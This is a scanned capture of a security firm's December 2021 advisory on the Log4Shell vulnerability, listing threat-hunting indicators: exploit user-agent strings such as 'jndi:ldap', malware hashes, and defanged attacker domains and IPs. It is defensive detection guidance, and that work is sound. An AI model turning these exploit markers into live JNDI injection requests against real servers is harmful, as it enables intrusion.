itcsecure.com
Open in
urlscan Pro
172.67.2.189
Public Scan
URL:
https://itcsecure.com/uncategorized/update-log4shell-cve-2021-44228-apache-log4j-vulnerability/
Submission: On July 13 via api from US — Scanned from DE
Submission: On July 13 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
GET https://itcsecure.com
<form class="elementor-search-form" role="search" action="https://itcsecure.com" method="get">
<div class="elementor-search-form__toggle">
<i aria-hidden="true" class="fas fa-search"></i> <span class="elementor-screen-only">Search</span>
</div>
<div class="elementor-search-form__container">
<input placeholder="Search..." class="elementor-search-form__input" type="search" name="s" title="Search" value="">
<div class="dialog-lightbox-close-button dialog-close-button">
<i aria-hidden="true" class="eicon-close"></i> <span class="elementor-screen-only">Close</span>
</div>
</div>
</form>GET https://itcsecure.com
<form class="elementor-search-form" role="search" action="https://itcsecure.com" method="get">
<div class="elementor-search-form__toggle">
<i aria-hidden="true" class="fas fa-search"></i> <span class="elementor-screen-only">Search</span>
</div>
<div class="elementor-search-form__container">
<input placeholder="Search..." class="elementor-search-form__input" type="search" name="s" title="Search" value="">
<div class="dialog-lightbox-close-button dialog-close-button">
<i aria-hidden="true" class="eicon-close"></i> <span class="elementor-screen-only">Close</span>
</div>
</div>
</form>Text Content
WE USE COOKIES ON OUR WEBSITE
These help us recognise you and your device and store some information about
your preferences. We set out more information in our Cookie Policy.
[#OOI_PERSONAL_INFORMATION#]
Use necessary cookies only Allow all cookies Show details
OK
Use necessary cookies only Allow selection Allow all cookies
Strictly Necessary
Functional
Performance
Targeting
Show details
Cookie declaration [#IABV2SETTINGS#] About
Strictly Necessary (10) Functional (4) Performance (4) Targeting (20)
Unclassified (1)
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms.
You can set your browser to block or alert you about these cookies, but some
parts of the site will not then work. These cookies do not store any personally
identifiable information.
NameProviderPurposeExpiryType__cf_bm [x2]Glassdoor
VimeoThis cookie is used to distinguish between humans and bots. This is
beneficial for the website, in order to make valid reports on the use of their
website.1 dayHTTPAWSALBGlassdoorRegisters which server-cluster is serving the
visitor. This is used in context with load balancing, in order to optimize user
experience. 6 daysHTTPAWSALBCORSGlassdoorRegisters which server-cluster is
serving the visitor. This is used in context with load balancing, in order to
optimize user experience. 6 daysHTTPJSESSIONIDGlassdoorPreserves users states
across page requests.1 dayHTTPSameSiteGlassdoorEnsures visitor browsing-security
by preventing cross-site request forgery. This cookie is essential for the
security of the website and visitor. 1 dayHTTPCONSENT [x2]Google
YouTubeUsed to detect if the visitor has accepted the marketing category in the
cookie banner. This cookie is necessary for GDPR-compliance of the website. 2
yearsHTTPCookieConsentCookiebotStores the user's cookie consent state for the
current domain1 yearHTTPelementorITC SecureUsed in context with the website's
WordPress theme. The cookie allows the website owner to implement or change the
website's content in real-time.PersistentHTML
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages.
If you do not allow these cookies then some or all of these services may not
function properly.
NameProviderPurposeExpiryTypeasstGlassdoorPending1 dayHTTPcassGlassdoorPending1
dayHTTPgdsidGlassdoorUsed to track which users have shown interest in what job
postings. The cookie ensures that the most relevant job postings are shown to
the specific user. 1 dayHTTPGSESSIONIDGlassdoorUsed to track which users have
shown interest in what job postings. The cookie ensures that the most relevant
job postings are shown to the specific user. 1 dayHTTP
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site.
They help us to know which pages are the most and least popular and see how
visitors move around the site.
All information these cookies collect is aggregated and therefore anonymous. If
you do not allow these cookies we will not know when you have visited our site,
and will not be able to monitor its performance.
NameProviderPurposeExpiryTypeADRUM_BTaGlassdoorThis cookie is used to detect
errors on the website - this information is sent to the website's support staff
in order to optimize the visitor's experience on the website.1
dayHTTP_gaGoogleRegisters a unique ID that is used to generate statistical data
on how the visitor uses the website.2 yearsHTTP_gatGoogleUsed by Google
Analytics to throttle request rate1 dayHTTP_gidGoogleRegisters a unique ID that
is used to generate statistical data on how the visitor uses the website.1
dayHTTP
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites.
They do not store directly personal information, but are based on uniquely
identifying your browser and internet device. If you do not allow these cookies,
you will experience less targeted advertising.
NameProviderPurposeExpiryTypeIDEGoogleUsed by Google DoubleClick to register and
report the website user's actions after viewing or clicking one of the
advertiser's ads with the purpose of measuring the efficacy of an ad and to
present targeted ads to the user.1 yearHTTPpagead/landing [x2]GoogleCollects
data on visitor behaviour from multiple websites, in order to present more
relevant advertisement - This also allows the website to limit the number of
times that they are shown the same advertisement.
SessionPixeltest_cookieGoogleUsed to check if the user's browser supports
cookies.1 dayHTTPgdIdGlassdoorUsed to track which users have shown interest in
what job postings. The cookie ensures that the most relevant job postings are
shown to the specific user. 10 yearsHTTPtrsGlassdoorUsed to track which users
have shown interest in what job postings. The cookie ensures that the most
relevant job postings are shown to the specific user. 1
yearHTTPpagead/1p-user-list/#GoogleTracks if the user has shown interest in
specific products or events across multiple websites and detects how the user
navigates between sites. This is used for measurement of advertisement efforts
and facilitates payment of referral-fees between
websites.SessionPixel_gcl_auGoogleUsed by Google AdSense for experimenting with
advertisement efficiency across websites using their services. 3
monthsHTTPVISITOR_INFO1_LIVEYouTubeTries to estimate the users' bandwidth on
pages with integrated YouTube videos.179 daysHTTPYSCYouTubeRegisters a unique ID
to keep statistics of what videos from YouTube the user has
seen.SessionHTTPytidb::LAST_RESULT_ENTRY_KEYYouTubeStores the user's video
player preferences using embedded YouTube
videoPersistentHTMLyt-remote-cast-availableYouTubeStores the user's video player
preferences using embedded YouTube
videoSessionHTMLyt-remote-cast-installedYouTubeStores the user's video player
preferences using embedded YouTube
videoSessionHTMLyt-remote-connected-devicesYouTubeStores the user's video player
preferences using embedded YouTube
videoPersistentHTMLyt-remote-device-idYouTubeStores the user's video player
preferences using embedded YouTube
videoPersistentHTMLyt-remote-fast-check-periodYouTubeStores the user's video
player preferences using embedded YouTube
videoSessionHTMLyt-remote-session-appYouTubeStores the user's video player
preferences using embedded YouTube
videoSessionHTMLyt-remote-session-nameYouTubeStores the user's video player
preferences using embedded YouTube
videoSessionHTMLyt.innertube::nextIdYouTubeRegisters a unique ID to keep
statistics of what videos from YouTube the user has
seen.PersistentHTMLyt.innertube::requestsYouTubeRegisters a unique ID to keep
statistics of what videos from YouTube the user has seen.PersistentHTML
Unclassified cookies are cookies that we are in the process of classifying,
together with the providers of individual cookies.
NameProviderPurposeExpiryTypealrGlassdoorPending1 dayHTTP
[#IABV2_LABEL_PURPOSES#] [#IABV2_LABEL_FEATURES#] [#IABV2_LABEL_PARTNERS#]
[#IABV2_BODY_PURPOSES#]
[#IABV2_BODY_FEATURES#]
[#IABV2_BODY_PARTNERS#]
What are cookies?
A cookie is a small text file that is downloaded to your browser when you access
a website. Cookies are used by many websites and can serve numerous purposes,
including remembering your preferences and other browsing session information,
or providing analytic data for the website creators.
How we use cookies
We use cookies for the purpose of analytics, necessary site functionality and
performance. We’re keen to understand how both potential and existing customers
interact with our services and marketing material, and we use that information
to improve what we offer. We do not serve third-party ads on our site, nor do we
provide any information about your browsing to marketing third parties. For more
information on how we use your data, please refer to our Privacy Notice.
Consent to use cookies
We will ask for your permission (consent) to place cookies or other similar
technologies on your device, except where these are essential for us to provide
you with a service that you have requested or are necessary for the website to
operate.
Cookie declaration last updated on 25.06.22 by Cookiebot
* Solutions
* Our Integrated Delivery Model
* NAVIGATOR
* Assess & Advise
* Digital Risk Protection
* PULSE: Our Platform
* Secure Networking
* Vulnerability Intelligence
* Behavioural Analytics
* Managed Detection and Response (MDR)
* Threat Intelligence
* Third-Party Risk Management
* Cyber Advisory
* Assess & Advise
* Awareness & Training
* Design & Implementation
* Security Assurance
* Security in Residence
* Digital Risk Protection
* Incident Response
* Zero Trust Identity & Access Management
* Resources
* News Centre
* ITC Blog
* Case Studies
* Events & Webinars
* Workshops
* White Papers & Reports
* Company
* We are ITC Secure
* Our People
* Our Partners
* Our Innovation
* Accreditations
* Careers
* Contact Us
Menu
* Solutions
* Our Integrated Delivery Model
* NAVIGATOR
* Assess & Advise
* Digital Risk Protection
* PULSE: Our Platform
* Secure Networking
* Vulnerability Intelligence
* Behavioural Analytics
* Managed Detection and Response (MDR)
* Threat Intelligence
* Third-Party Risk Management
* Cyber Advisory
* Assess & Advise
* Awareness & Training
* Design & Implementation
* Security Assurance
* Security in Residence
* Digital Risk Protection
* Incident Response
* Zero Trust Identity & Access Management
* Resources
* News Centre
* ITC Blog
* Case Studies
* Events & Webinars
* Workshops
* White Papers & Reports
* Company
* We are ITC Secure
* Our People
* Our Partners
* Our Innovation
* Accreditations
* Careers
* Contact Us
Search
Close
Linkedin Twitter Facebook Youtube
Contact Us
* Solutions
* Our Integrated Delivery Model
* NAVIGATOR
* Assess & Advise
* Digital Risk Protection
* PULSE: Our Platform
* Secure Networking
* Vulnerability Intelligence
* Behavioural Analytics
* Managed Detection and Response (MDR)
* Threat Intelligence
* Third-Party Risk Management
* Cyber Advisory
* Assess & Advise
* Awareness & Training
* Design & Implementation
* Security Assurance
* Security in Residence
* Digital Risk Protection
* Incident Response
* Zero Trust Identity & Access Management
* Resources
* News Centre
* ITC Blog
* Case Studies
* Events & Webinars
* Workshops
* White Papers & Reports
* Company
* We are ITC Secure
* Our People
* Our Partners
* Our Innovation
* Accreditations
* Careers
* Contact Us
Menu
* Solutions
* Our Integrated Delivery Model
* NAVIGATOR
* Assess & Advise
* Digital Risk Protection
* PULSE: Our Platform
* Secure Networking
* Vulnerability Intelligence
* Behavioural Analytics
* Managed Detection and Response (MDR)
* Threat Intelligence
* Third-Party Risk Management
* Cyber Advisory
* Assess & Advise
* Awareness & Training
* Design & Implementation
* Security Assurance
* Security in Residence
* Digital Risk Protection
* Incident Response
* Zero Trust Identity & Access Management
* Resources
* News Centre
* ITC Blog
* Case Studies
* Events & Webinars
* Workshops
* White Papers & Reports
* Company
* We are ITC Secure
* Our People
* Our Partners
* Our Innovation
* Accreditations
* Careers
* Contact Us
Search
Close
Linkedin Twitter Facebook Youtube
Contact Us
UPDATE: LOG4SHELL –CVE-2021-44228 –APACHE LOG4J VULNERABILITY
* December 15, 2021
* 9:12 am
* ITC Secure
Priority: Critical
Executive Summary:
ITC Secure is continuing to monitor for any alerts that could indicate an
incident related to the recent Log4J vulnerability. ITC have carried out threat
hunting across the available log sources we ingest into Sentinel for signs of
initial compromise and reviewed endpoint activity for suspicious process
executions which would be seen following any initial compromise. ITC will
continue to carry out these threat hunting activities and will escalate any
findings.
We are conscious that we may not have coverage of all log sources within your
estate and at the time of preparing this report, have provided further details
and information on IOCs that your internal Network and Security Teams can use to
assist further investigation.
Specific guidance that has been published by Microsoft can be found here.
Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2
exploitation -Microsoft Security Blog
Further Guidance at the time of preparing this report:
IOCs:
While user agent strings are available from different log sources, to detect
CVE-2021-44228, IIS server logs should be reviewed for evidence of the below
user agents:
“jndi:ldap”
“Basic/Command/Base64”
If the above user agent strings are found within the IIS logs it is not
indicative that a compromise has occurred, but it does indicate that someone has
attempted to exploit the server. If the server was vulnerable to CVE-2021-44228
it may have succeeded. Please reach out to the ITC SOC should you find any
reference to these user agent strings with the targeted server so that we can
provide further investigation.
Hashes:
These hashes have been identified as being involved in the recent Log4j attacks.
If you have the means to search for hashes through anti-virus or similar,
consider searching for evidence of these hashes within your environment. If
found, contact ITC SOC for further investigation. If you can block the hashes,
consider doing so but understand that attackers will be regularly changing their
payloads to avoid detection through these IOCs.
8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a
3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26
776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81
2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049
19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d
2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec
2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28
6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b
63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9
6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05
715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7
776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81
a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce
b3a6fe5bc3883fd26c682bb6271a700b8a6fe006ad8df6c09cc87530fcd3a778
b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0
c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40
c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799
e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80
fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0
Domains:
ITC has carried out and will continue to carry out threat hunting using the
below domains which have been identified as being involved with CVE-2021-44228.
Due to the nature of this attack, domains that host malicious payloads will
change frequently to avoid detection or due to takedowns.
x41[.]me
m3[.]wtf
cuminside[.]club
abrahackbugs[.]xyz
pwn[.]af
rce[.]ee
psc4fuel[.]com
rs3c1[.]com
leakix[.]net
IPs:
ITC has carried out and will continue to threat hunt using the below IP
addresses against firewall logs where available.
109.237.96[.]124
185.100.87[.]202
213.164.204[.]146
185.220.101[.]146
171.25.193[.]20
178.17.171[.]102
45.155.205[.]233
171.25.193[.]25
171.25.193[.]77
171.25.193[.]78
185.220.100[.]242
IPs Continued:
185.220.101[.]39
18.27.197[.]252
89.234.182[.]139
104.244.79[.]6
164.52.212[.]196
193.196.53[.]232
121.5.113[.]11
178.176.202[.]121
178.176.203[.]190
197.246.171[.]83
42.192.11[.]41
45.130.229[.]168
18.228.7[.]109
45.33.47[.]240
80.78.254[.]57
176.32.33[.]14
137.184.61[.]190
45.33.47[.]240
80.78.254[.]57
205.185.115[.]217
176.32.33[.]14
104.244.74[.]57
104.244.76[.]170
107.189.12[.]135
116.24.67[.]213
134.122.34[.]28
137.184.102[.]82
122.161.50[.]23
137.184.106[.]119
142.93.34[.]250
143.198.32[.]72
143.198.45[.]117
147.182.167[.]165
147.182.169[.]254
147.182.219[.]9
151.115.60[.]113
159.65.155[.]208
159.65.58[.]66
164.90.199[.]216
167.99.164[.]201
167.99.172[.]213
167.99.172[.]58
178.62.79[.]49
181.214.39[.]2
185.220.101[.]134
185.220.101[.]138
185.220.101[.]141
185.220.101[.]143
185.220.101[.]144
185.220.101[.]145
185.220.101[.]147
185.220.101[.]149
185.220.101[.]154
IPs Continued:
185.220.101[.]156
185.220.101[.]157
185.220.101[.]158
185.220.101[.]160
185.220.101[.]161
185.220.101[.]163
185.220.101[.]171
185.220.101[.]172
185.220.101[.]175
185.220.101[.]177
185.220.101[.]180
185.220.101[.]181
185.220.101[.]182
185.220.101[.]185
185.220.101[.]186
185.220.101[.]189
185.220.101[.]191
193.189.100[.]203
194.48.199[.]78
195.19.192[.]26
195.254.135[.]76
195.54.160[.]149
23.129.64[.]131
185.38.175[.]132
188.166.122[.]43
188.166.48[.]55
188.166.92[.]228
23.129.64[.]146
23.129.64[.]148
45.153.160[.]131
46.182.21[.]248
54.173.99[.]121
62.102.148[.]69
62.76.41[.]46
68.183.198[.]247
68.183.44[.]143
72.223.168[.]73
81.17.18[.]60
92.63.197[.]53
164.52.53[.]163
164.52.53[.]163
185.220.100[.]240
198.98.60[.]19
86.109.208[.]194
41.203.140[.]114
49.7.224[.]217
195.251.41[.]139
189.188.33[.]125
PrevPreviousLog4Shell –CVE-2021-44228 –Apache Log4j Vulnerability
NextUPDATE: Log4Shell –CVE-2021-44228 –Apache Log4j Vulnerability (15.12.21)Next
RELATED POSTS
People, technology and governance
PEOPLE @ ITC: Q&A WITH ALAN ARMSTRONG, ITC SENIOR CLOUD SECURITY & IDENTITY
CONSULTANT
Read More »
Building competitive advantage
BALANCING COMPLEXITY AND SIMPLICITY IN CYBER SECURITY
Read More »
Threat Horizon
SONICWALL ADVISORY: PATCHES FOR SSLVPN SMA1000 DEVICES
Read More »
Threat Horizon
CRITICAL F5 BIG-IP BUG
Read More »
FIND OUT HOW WE CAN MAKE YOUR DIGITAL WORLD A SAFER PLACE TO DO BUSINESS.
Talk to us
© ITC Secure. All rights reserved.
* Articles
* Privacy Policy
* Recruitment Privacy Notice
* Modern Slavery Statement
* Cookie Policy
Please share your location to continue.
Check our help guide for more info.